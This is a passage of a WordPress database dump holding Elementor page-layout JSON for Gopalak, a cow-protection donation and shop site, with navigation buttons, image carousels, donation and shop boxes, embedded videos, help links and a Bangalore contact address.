namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":0,\"bottom\":\"4\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11874,1969,'_elementor_page_assets','a:0:{}'),(11877,1970,'_elementor_edit_mode','builder'),(11878,1970,'_elementor_template_type','wp-page'),(11879,1970,'_elementor_version','3.7.8'),(11880,1970,'_wp_page_template','elementor_canvas'),(11881,1970,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":0,\"bottom\":\"4\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by 